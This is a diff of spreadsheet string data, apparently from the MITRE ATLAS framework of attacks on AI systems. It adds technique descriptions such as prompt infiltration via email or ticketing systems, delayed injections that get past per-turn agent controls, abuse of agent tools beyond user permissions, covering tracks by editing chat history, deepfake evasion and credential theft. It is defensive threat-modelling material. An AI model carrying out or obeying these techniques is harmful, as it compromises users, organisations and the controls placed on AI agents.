+  <si>
     <t>Obtain Capabilities</t>
   </si>
   <si>
@@ -1108,6 +1186,12 @@
     <t>Pre-Print Repositories</t>
   </si>
   <si>
+    <t>Process Discovery</t>
+  </si>
+  <si>
+    <t>Prompt Infiltration via Public-Facing Application</t>
+  </si>
+  <si>
     <t>Publish Hallucinated Entities</t>
   </si>
   <si>
@@ -1144,6 +1228,9 @@
     <t>Search Open Technical Databases</t>
   </si>
   <si>
+    <t>Search Open Websites/Domains</t>
+  </si>
+  <si>
     <t>Search Victim-Owned Websites</t>
   </si>
   <si>
@@ -1196,6 +1283,9 @@
   </si>
   <si>
     <t>Unsecured Credentials</t>
+  </si>
+  <si>
+    <t>Use Alternate Authentication Material</t>
   </si>
   <si>
     <t>Use Pre-Trained Model</t>
@@ -1221,7 +1311,8 @@
   </si>
   <si>
     <t>Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.
-This may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.</t>
+This may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.
+AI agents may be configured to have access to tools that are not directly accessible by users. Adversaries may abuse this to gain access to tools they otherwise wouldn't be able to use.</t>
   </si>
   <si>
     <t>Adversaries may prompt the AI service to invoke various tools the agent has access to. Tools may retrieve data from different APIs or services in an organization.</t>
@@ -1288,9 +1379,9 @@
 Understanding these triggers can reveal how the AI agent is activated and controlled. This may also expose additional paths for compromise, as an adversary could attempt to trigger the agent from outside its environment and drive it to perform unintended or malicious actions.</t>
   </si>
   <si>
-    <t xml:space="preserve">An adversary may probe or scan the victim system to gather information for targeting.
-This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.
-</t>
+    <t>An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.
+Adversaries may scan for open ports on a potential victim's network, which can indicate specific services or tools the victim is utilizing. This could include a scan for tools related to AI DevOps or AI services themselves such as public AI chat agents (ex: [Copilot Studio Hunter](https://github.com/mbrg/power-pwn/wiki/Modules:-Copilot-Studio-Hunter-%E2%80%90-Enum)). They can also send emails to organization service addresses and inspect the replies for indicators that an AI agent is managing the inbox.
+Information gained from Active Scanning may yield targets that provide opportunities for other forms of reconnaissance such as [Search Open Technical Databases](/techniques/AML.T0000), [Search Open AI Vulnerability Analysis](/techniques/AML.T0001), or [Gather RAG-Indexed Targets](/techniques/AML.T0064).</t>
   </si>
   <si>
     <t>Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack.</t>
@@ -1300,6 +1391,10 @@
 They may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)).
 They may implement ideas described in public research papers or develop custom made attacks for the victim model.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
+Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.</t>
   </si>
   <si>
     <t xml:space="preserve">In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.
@@ -1378,7 +1473,8 @@
 An adversary can poison a dataset by modifying the labels being generated by the labeling service.</t>
   </si>
   <si>
-    <t>Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.</t>
+    <t>Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.
+AI agents may be configured to have access to tools and data sources that are not directly accessible by users. Adversaries may abuse this to collect data that a regular user wouldn't be able to access directly.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may leverage information repositories to mine valuable information.
@@ -1401,6 +1497,11 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may include instructions to be followed by the AI system in response to a future event, such as a specific keyword or the next interaction, in order to evade detection or bypass controls placed on the AI system.
+For example, an adversary may include "If the user submits a new request..." followed by the malicious instructions as part of their prompt.
+AI agents can include security measures against prompt injections that prevent the invocation of particular tools or access to certain data sources during a conversation turn that has untrusted data in context. Delaying the execution of instructions to a future interaction or keyword is one way adversaries may bypass this type of control.</t>
+  </si>
+  <si>
     <t>Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.
 Since many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.
 Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.</t>
@@ -1478,9 +1579,8 @@
 </t>
   </si>
   <si>
-    <t>Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevent a AI model from correctly identifying the contents of the data.
-This technique can be used to evade a downstream task where AI is utilized.
-The adversary may evade AI based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.</t>
+    <t>Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevents an AI model from correctly identifying the contents of the data or [Generate Deepfakes](/techniques/AML.T0088) that fools an AI model expecting authentic data.
+This technique can be used to evade a downstream task where AI is utilized. The adversary may evade AI-based virus/malware detection or network scanning towards the goal of a traditional cyber attack. AI model evasion through deepfake generation may also provide initial access to systems that use AI-based biometric authentication.</t>
   </si>
   <si>
     <t>Adversaries may use prompts to invoke an agent's tool capable of performing write operations to exfiltrate data. Sensitive information can be encoded into the tool's input parameters and transmitted as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos.</t>
@@ -1535,6 +1635,16 @@
 RAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.</t>
   </si>
   <si>
+    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, photos, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
+Adversaries may gather this information in various ways, such as direct elicitation, [Search Victim-Owned Websites](/techniques/AML.T0003), or via leaked information on the black market.
+Adversaries may use the gathered victim data to Create Deepfakes and impersonate them in a convincing manner. This may create opportunities for adversaries to [Establish Accounts](/techniques/AML.T0021) under the impersonated identity, or allow them to perform convincing [Phishing](/techniques/AML.T0052) attacks.</t>
+  </si>
+  <si>
+    <t>Adversaries may use generative artificial intelligence (GenAI) to create synthetic media (i.e. imagery, video, audio, and text) that appear authentic. These "[deepfakes]( https://en.wikipedia.org/wiki/Deepfake)" may mimic a real person or depict fictional personas. Adversaries may use deepfakes for impersonation to conduct [Phishing](/techniques/AML.T0052) or to evade AI applications such as biometric identity verification systems (see [Evade AI Model](/techniques/AML.T0015)).
+Manipulation of media has been possible for a long time, however GenAI reduces the skill and level of effort required, allowing adversaries to rapidly scale operations to target more users or systems. It also makes real-time manipulations feasible.
+Adversaries may utilize open-source models and software that were designed for legitimate use cases to generate deepfakes for malicious use. However, there are some projects specifically tailored towards malicious use cases such as [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/).</t>
+  </si>
+  <si>
     <t>Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.
 Adversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.</t>
   </si>
@@ -1551,10 +1661,9 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may infer the membership of a data sample in its training set, which raises privacy concerns.
+    <t>Adversaries may infer the membership of a data sample or global characteristics of the data in its training set, which raises privacy concerns.
 Some strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](/techniques/AML.T0005.001), others use statistics of model prediction scores.
-This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.
-</t>
+This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.</t>
   </si>
   <si>
     <t xml:space="preserve">The adversary may add a perceptual trigger into inference data.
@@ -1596,7 +1705,7 @@
 The effects of a prompt injection can persist throughout an interactive session with an LLM.
 Malicious prompts may be injected directly by the adversary ([Direct](/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects.
 Prompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.
-Malicious prompts may also be [Triggered](/techniques/AML.T0051.002) by user inputs defined by the adversary.</t>
+Malicious prompts may also be [Triggered](/techniques/AML.T0051.002) user actions or system events.</t>
   </si>
   <si>
     <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
@@ -1630,6 +1739,11 @@
     <t>Adversaries may directly manipulate an AI model to change its behavior or introduce malicious code. Manipulating a model gives the adversary a persistent change in the system. This can include poisoning the model by changing its weights, modifying the model architecture to change its behavior, and embedding malware which may be executed when the model is loaded.</t>
   </si>
   <si>
+    <t>Adversaries may manipulate a user's large language model (LLM) chat history to cover the tracks of their malicious behavior. They may hide persistent changes they have made to the LLM's behavior, or obscure their attempts at discovering private information about the user.
+To do so, adversaries may delete or edit existing messages or create new threads as part of their coverup. This is feasible if the adversary has the victim's authentication tokens for the backend LLM service or if they have direct access to the victim's chat interface. 
+Chat interfaces (especially desktop interfaces) often do not show the injected prompt for any ongoing chat, as they update chat history only once when initially opening it. This can help the adversary's manipulations go unnoticed by the victim.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may manually modify the input data to craft adversarial data.
 They may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task.
 The adversary may use trial and error until they are able to verify they have a working adversarial input.
@@ -1666,6 +1780,10 @@
 The effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.</t>
   </si>
   <si>
+    <t>Adversaries may extract credentials from OS caches, application memory, or other sources on a compromised system. Credentials are often in the form of a hash or clear text, and can include usernames and passwords, application tokens, or other authentication keys.
+Credentials can be used to perform [Lateral Movement](/tactics/AML.TA0015) to access other AI services such as AI agents, LLMs, or AI inference APIs. Credentials could also give an adversary access to other software tools and data sources that are part of the AI DevOps lifecycle.</t>
+  </si>
+  <si>
     <t>Adversaries may search for and obtain software capabilities for use in their operations.
 Capabilities may be specific to AI-based attacks [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular AI-enabled system.</t>
   </si>
@@ -1702,6 +1820,16 @@
 Pre-print repositories also serve as a central location to share papers that have been accepted to journals.
 Searching pre-print repositories  provide adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may attempt to get information about processes running on a system. Once obtained, this information could be used to gain an understanding of common AI-related software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details.
+Identifying the AI software stack can then lead an adversary to new targets and attack pathways. AI-related software may require application tokens to authenticate with backend services. This provides opportunities for [Credential Access](/tactics/AML.TA0013) and [Lateral Movement](/tactics/AML.TA0015).
+In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or `Get-Process` via PowerShell. Information about processes can also be extracted from the output of Native API calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.</t>
+  </si>
+  <si>
+    <t>An adversary may introduce malicious prompts into the victim's system via a public-facing application with the intention of it being ingested by an AI at some point in the future and ultimately having a downstream effect. This may occur when a data source is indexed by a retrieval augmented generation (RAG) system, when a rule triggers an action by an AI agent, or when a user utilizes a large language model (LLM) to interact with the malicious content. The malicious prompts may persist on the victim system for an extended period and could affect multiple users and various AI tools within the victim organization.
+Any public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira.
+Adversaries may perform [Reconnaissance](/tactics/AML.TA0002) to identify public facing applications that are likely monitored by an AI agent or are likely to be indexed by a RAG. They may perform [Discover AI Agent Configuration](/techniques/AML.T0084) to refine their targeting.</t>
   </si>
   <si>
     <t>Adversaries may create an entity they control, such as a software package, website, or email address to a source hallucinated by an LLM. The hallucinations may take the form of package names commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed.</t>
@@ -1755,6 +1883,10 @@
 Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy AI Model](/techniques/AML.T0005)).
 An adversary can search these resources for publications for authors employed at the victim organization.
 Research and technical materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).</t>
+  </si>
+  <si>
+    <t>Adversaries may search public websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or domains owned by the victim.
+Adversaries may find the information they seek to gather via search engines. They can use precise search queries to identify software platforms or services used by the victim to use in targeting. This may be followed by [Exploit Public-Facing Application](/techniques/AML.T0049) or [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093).</t>
   </si>
   <si>
     <t>Adversaries may search websites owned by the victim for information that can be used during targeting.
@@ -1834,7 +1966,7 @@
 </t>
   </si>
   <si>
-    <t>The adversary injects instructions to be followed by the AI system in response to a future event, either a specific keyword or the next interaction. The triggering events can range from simple phrases to complex and covert signals, including encoded or steganographic payloads hidden within seemingly benign content.</t>
+    <t>An adversary may trigger a prompt injection via a user action or event that occurs within the victim's environment. Triggered prompt injections often target AI agents, which can be activated by means the adversary identifies during [Discovery](/tactics/AML.TA0008) (See [Activation Triggers](/techniques/AML.T0084.002)). These malicious prompts may be hidden or obfuscated from the user and may already exist somewhere in the victim's environment from the adversary performing [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093). This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.</t>
   </si>
   <si>
     <t>Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.
@@ -1847,6 +1979,10 @@
     <t xml:space="preserve">Adversaries may search compromised systems to find and obtain insecurely stored credentials.
 These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).
 </t>
+  </si>
+  <si>
+    <t>Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
+AI services commonly use alternate authentication material as a primary means for users to make queries, making them vulnerable to this technique.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.
@@ -1930,6 +2066,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0017.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0091.000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0043.001</t>
   </si>
   <si>
@@ -1981,6 +2120,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0002.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0094</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0029</t>
   </si>
   <si>
@@ -2068,6 +2210,12 @@
     <t>https://atlas.mitre.org/techniques/AML.T0064</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0087</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0088</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
   </si>
   <si>
@@ -2122,6 +2270,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0018</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0092</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
   </si>
   <si>
@@ -2143,6 +2294,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0018.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0090</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0016</t>
   </si>
   <si>
@@ -2164,6 +2318,12 @@
     <t>https://atlas.mitre.org/techniques/AML.T0000.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0089</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0093</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0060</t>
   </si>
   <si>
@@ -2200,6 +2360,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0095</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0003</t>
   </si>
   <si>
@@ -2254,6 +2417,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0055</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0091</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0005.002</t>
   </si>
   <si>
@@ -2272,7 +2438,7 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>14 October 2025</t>
+    <t>07 November 2025</t>
   </si>
   <si>
     <t>Persistence</t>
@@ -2302,12 +2468,12 @@
     <t>Reconnaissance</t>
   </si>
   <si>
+    <t>Defense Evasion</t>
+  </si>
+  <si>
     <t>AI Attack Staging</t>
   </si>
   <si>
-    <t>Defense Evasion</t>
-  </si>
-  <si>
     <t>Execution</t>
   </si>
   <si>
@@ -2329,9 +2495,15 @@
     <t>Persistence, Resource Development</t>
   </si>
   <si>
+    <t>Initial Access, Persistence</t>
+  </si>
+  <si>
     <t>Command and Control</t>
   </si>
   <si>
+    <t>Lateral Movement</t>
+  </si>
+  <si>
     <t>ATLAS</t>
   </si>
   <si>
@@ -2368,6 +2540,9 @@
     <t>AML.TA0004</t>
   </si>
   <si>
+    <t>AML.TA0015</t>
+  </si>
+  <si>
     <t>AML.TA0006</t>
   </si>
   <si>
@@ -2380,49 +2555,52 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--3d648b3b-c609-4498-9ccb-16dd92b60091</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--752d1bc1-97de-477d-bf60-1d6eef797fa8</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--3949dfa9-6172-4c97-9ced-624c184e936a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--b5c5cf31-bd9d-40dc-b673-f261ed48b204</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8bcf6ab3-0b9f-45da-9e46-be41577ce725</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c8995d92-8f23-48cd-84da-b576a1dd50d9</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--98c004ae-ea40-4179-bd26-c61102a6e60c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--071ddd01-4a5f-44d3-9d29-07232cc32630</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--ce033093-71eb-4009-954d-e56200e0de0b</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--ae6ffd21-ff6f-444e-9c67-582f19ff8205</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--42040456-663d-41f0-a84d-7d6c69210733</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--19343568-5860-4816-8c91-9639b9cbb197</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--e1a03122-79b9-4440-8214-ab53b0f944d8</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--044fbb79-dd83-40e9-abe0-f78e23325e92</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8d99d2d9-2cfd-4645-9ebe-46532a9c5eba</t>
+    <t>x-mitre-tactic--4feff9e4-aee4-4571-b329-bb78c5738548</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8085216f-c5c2-4e4f-b70a-bc7d41c544e5</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d0680b48-998e-47be-82d7-fdccb805b62a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--dfc0b9cd-a5e0-4a05-b421-5a0e043a4726</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--0a3bc91e-01df-45b4-acf2-e9fafdb880be</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--ccdaa350-7756-4a01-a668-e2086a7681fb</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--0adbfafb-0143-46e4-b591-60ead0b8876e</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--25ecab3c-b08d-413f-a314-b1c764c84234</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--eff529c7-9491-4759-bc69-a7e40aaaba24</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a665e54e-52b1-4cf0-9ac3-467193e291f9</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--0d9af269-8f31-4266-8b30-20424293cc4c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c0d63274-70df-42de-84dc-d43b6f8706c7</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--ee99e085-c667-4a96-a9eb-7da8b90cad5a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a8b81c1c-7483-4314-81cf-6fcdaa6587ff</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d330c9b0-e3d4-4bd1-b943-c3a4773891a6</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a2c31be5-5741-41f9-bbf1-f300fd33697c</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -2492,6 +2670,10 @@
 The target system could be a network, mobile device, or an edge device such as a sensor platform.
 The AI capabilities used by the system could be local with onboard or cloud-enabled AI capabilities.
 Initial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to move through your AI environment.
+Lateral Movement consists of techniques that adversaries may use to gain access to and control other systems or components in the environment. Adversaries may pivot towards AI Ops infrastructure such as model registries, experiment trackers, vector databases, notebooks, or training pipelines. As the adversary moves through the environment, they may discover means of accessing additional AI-related tools, services, or applications. AI agents may also be a valuable target as they commonly have more permissions than standard user accounts on the system.</t>
   </si>
   <si>
     <t>The adversary is trying to maintain their foothold via AI artifacts or software.
@@ -2555,6 +2737,9 @@
     <t>https://atlas.mitre.org/tactics/AML.TA0004</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/tactics/AML.TA0015</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/tactics/AML.TA0006</t>
   </si>
   <si>
@@ -2570,6 +2755,9 @@
     <t>relationship citations</t>
   </si>
   <si>
+    <t>AML.M0028</t>
+  </si>
+  <si>
     <t>AML.M0023</t>
   </si>
   <si>
@@ -2603,6 +2791,9 @@
     <t>AML.M0022</t>
   </si>
   <si>
+    <t>AML.M0029</t>
+  </si>
+  <si>
     <t>AML.M0010</t>
   </si>
   <si>
@@ -2615,12 +2806,21 @@
     <t>AML.M0025</t>
   </si>
   <si>
+    <t>AML.M0031</t>
+  </si>
+  <si>
     <t>AML.M0003</t>
   </si>
   <si>
     <t>AML.M0002</t>
   </si>
   <si>
+    <t>AML.M0026</t>
+  </si>
+  <si>
+    <t>AML.M0030</t>
+  </si>
+  <si>
     <t>AML.M0011</t>
   </si>
   <si>
@@ -2630,6 +2830,9 @@
     <t>AML.M0007</t>
   </si>
   <si>
+    <t>AML.M0027</t>
+  </si>
+  <si>
     <t>AML.M0006</t>
   </si>
   <si>
@@ -2648,82 +2851,103 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--dd3aa631-4640-4ea8-b630-3dd4588beea2</t>
-  </si>
-  <si>
-    <t>course-of-action--7ddd1f7d-1f39-4efd-97ce-2a0577b9d967</t>
-  </si>
-  <si>
-    <t>course-of-action--02fba334-0ac7-4005-bf1e-4815788a2a97</t>
-  </si>
-  <si>
-    <t>course-of-action--ef50cc5e-4cdd-483d-83a7-feae98e63a59</t>
-  </si>
-  <si>
-    <t>course-of-action--0c640f67-3d2c-4967-9975-ab0b80eb9330</t>
-  </si>
-  <si>
-    <t>course-of-action--ce135f7f-9edf-4942-a804-9478173dfeba</t>
-  </si>
-  <si>
-    <t>course-of-action--aed8bf3d-fca8-4aec-a25f-44143f4e4ac3</t>
-  </si>
-  <si>
-    <t>course-of-action--b263053e-cd0a-4502-8b33-50f9070d49a3</t>
-  </si>
-  <si>
-    <t>course-of-action--b0f8611d-5802-42ab-864b-2470ffcd6d28</t>
-  </si>
-  <si>
-    <t>course-of-action--0ce9c1dd-593d-4f87-a526-1cae567bc902</t>
-  </si>
-  <si>
-    <t>course-of-action--3dd5c016-2590-4bf3-a014-e8ad56ec8429</t>
-  </si>
-  <si>
-    <t>course-of-action--6d88c859-0afa-4bf9-852d-5297273a41c7</t>
-  </si>
-  <si>
-    <t>course-of-action--3d9c49c8-153c-4f28-af3f-8da9bc53aff6</t>
-  </si>
-  <si>
-    <t>course-of-action--267a1957-3eeb-456e-b20c-8bfc4203c25e</t>
-  </si>
-  <si>
-    <t>course-of-action--6b8233eb-5491-4faf-9de6-4b52d096e3c7</t>
-  </si>
-  <si>
-    <t>course-of-action--c18258e4-7399-4e2a-8d6e-e9a841b51111</t>
-  </si>
-  <si>
-    <t>course-of-action--3a3e11fa-b453-4d13-9117-3ec2b79c02fe</t>
-  </si>
-  <si>
-    <t>course-of-action--ded500ba-507c-4846-956e-e6e8e26bb16c</t>
-  </si>
-  <si>
-    <t>course-of-action--e24214b3-1a11-4597-b4e0-d410f1d90754</t>
-  </si>
-  <si>
-    <t>course-of-action--87fc5780-6b5f-4c93-a4a7-bb928f36478b</t>
-  </si>
-  <si>
-    <t>course-of-action--482dddc6-c06d-4902-b567-a765851c6b63</t>
-  </si>
-  <si>
-    <t>course-of-action--ee7a3c90-4624-4508-86b2-5995c131e852</t>
-  </si>
-  <si>
-    <t>course-of-action--71e80285-9441-4c34-89ff-3c5d279efa74</t>
-  </si>
-  <si>
-    <t>course-of-action--603fba78-8bfd-4fba-a551-c76394590135</t>
-  </si>
-  <si>
-    <t>course-of-action--bd9f1b3e-c8ee-4b5a-8d8d-d78fb4ca5ed7</t>
-  </si>
-  <si>
-    <t>course-of-action--0118178b-98d8-48b4-b9e7-7da0f55e073c</t>
+    <t>course-of-action--66662d10-2079-45da-a850-8b29aa0ff90a</t>
+  </si>
+  <si>
+    <t>course-of-action--26a9b3d1-0c48-415f-a011-1b864defc455</t>
+  </si>
+  <si>
+    <t>course-of-action--081d6d9e-aecf-46f3-b035-0253b8d1501f</t>
+  </si>
+  <si>
+    <t>course-of-action--32caa8ed-49bc-4485-b068-838e97a772dc</t>
+  </si>
+  <si>
+    <t>course-of-action--c643d9f7-525f-4c21-bf6e-4b577c75484d</t>
+  </si>
+  <si>
+    <t>course-of-action--7330b481-cb73-4100-b533-1135c440ecdb</t>
+  </si>
+  <si>
+    <t>course-of-action--dc781da8-1943-49ea-8f8c-a0c0a86f5f5c</t>
+  </si>
+  <si>
+    <t>course-of-action--40a562b5-8795-4064-99ea-2e77d11a87d3</t>
+  </si>
+  <si>
+    <t>course-of-action--94ba89e5-060a-4aa9-8805-a874d2a63644</t>
+  </si>
+  <si>
+    <t>course-of-action--3fec7122-a13d-436a-abd8-f988abafad4d</t>
+  </si>
+  <si>
+    <t>course-of-action--a1ba8096-3f60-4429-a2f9-93134c913f2f</t>
+  </si>
+  <si>
+    <t>course-of-action--11d3600c-6e97-4c8e-ace6-258abb52bf5e</t>
+  </si>
+  <si>
+    <t>course-of-action--6a80465b-491d-4456-8a1c-dad1f6084073</t>
+  </si>
+  <si>
+    <t>course-of-action--6bef67bf-7cb7-459e-8d8c-f998960fc931</t>
+  </si>
+  <si>
+    <t>course-of-action--0eb2eed7-21fb-4c0e-bc05-f70d08af6cdd</t>
+  </si>
+  <si>
+    <t>course-of-action--e4e9faf1-8700-4aa8-8967-b87c4b64a373</t>
+  </si>
+  <si>
+    <t>course-of-action--59f1f2f3-4d14-419a-b3c4-954f966e5896</t>
+  </si>
+  <si>
+    <t>course-of-action--5d04760c-107b-429a-81e0-338ea6b74160</t>
+  </si>
+  <si>
+    <t>course-of-action--4aff65a9-0850-4f32-bb40-26a37145a218</t>
+  </si>
+  <si>
+    <t>course-of-action--3e3e763d-2a04-47e0-bfa6-848701bcab8b</t>
+  </si>
+  <si>
+    <t>course-of-action--7dfca9f9-9bac-43b9-a0cd-7931a854d3f0</t>
+  </si>
+  <si>
